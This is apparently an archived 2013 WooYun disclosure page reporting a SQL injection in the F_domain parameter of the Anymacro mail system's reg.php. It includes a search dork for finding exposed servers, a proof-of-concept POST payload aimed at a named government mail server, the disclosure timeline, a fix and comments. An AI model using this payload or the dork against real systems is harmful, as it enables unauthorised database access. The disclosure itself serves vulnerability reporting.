当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038636

漏洞标题:安宁邮件系统(Anymacro)sqlinject漏洞

相关厂商:Anymacro

漏洞作者: 想要减肥的胖纸

提交时间:2013-10-01 00:24

修复时间:2013-12-30 00:25

公开时间:2013-12-30 00:25

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-01: 细节已通知厂商并且等待厂商处理中
2013-10-05: 厂商已经确认,细节仅向厂商公开
2013-10-08: 细节向第三方安全合作伙伴开放
2013-11-29: 细节向核心白帽子及相关领域专家公开
2013-12-09: 细节向普通白帽子公开
2013-12-19: 细节向实习白帽子公开
2013-12-30: 细节向公众公开

简要描述:

非之前登录框注入。危害范围很大,建议安宁厂商给所有各户老版本邮件系统升级到最新版本

详细说明:

/reg.php的F_domain参数存在sql注入

漏洞证明:

以下系统都有可能存在注入
http://203.208.46.145/#newwindow=1&q=inurl:reg.php%3FF_lang&start=10
poc

http://mail.sjz.gov.cn/reg.php
post:
F_chkcode_enc=mA4h8UuOqt0=&F_regpass=123&F_name=123321&F_email=112333&F_domain=sjz.gov.cn' AND 7955=7955 AND 'Ldun'='Ldun&F_password=123321&F_password2=123321&F_chkcode=233326&act=%D7%A2+%B2%E1


QQ20130930-1@2x.png


QQ20130930-2@2x.png


QQ20130930-5@2x.png


修复方案:

临时解决办法 删除reg.php

版权声明:转载请注明来源 想要减肥的胖纸@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-10-05 22:47

厂商回复:

暂无

最新状态:

2013-10-13:根据CNVD后续测试结果,在多个政府部门应用实例中,已经删除存在漏洞点的页面,只测得少数实例。已经在节后及时通知安宁邮件软件生产厂商——安宁公司处置。


漏洞评价:

评论

  1. 2013-10-02 00:42 | cncert国家互联网应急中心(乌云厂商)

    国庆MARK。

  2. 2013-10-07 12:59 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    需要登录吗

  3. 2013-10-07 17:42 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    @专业种田 你猜。

  4. 2013-10-07 17:55 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    猜对有奖吗。。我猜要登录

  5. 2013-10-13 19:26 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    登录后有好几个sql啊..

  6. 2013-10-14 13:26 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    看到cnvd回复,看来只是重视政府部门。呵呵

  7. 2013-11-06 14:07 | cncert国家互联网应急中心(乌云厂商)

    @想要减肥的胖纸 政府部门处置渠道较为顺畅,因此对于通用软件漏洞重点先测试政府及重要行业单位。对于一些案例中涉及的小公司,很多情况下超出CNCERT联系能力所及。

  8. 2013-11-06 17:57 | 想要减肥的胖纸 ( 普通白帽子 | Rank:250 漏洞数:42 )

    @cncert国家互联网应急中心 恩懂了。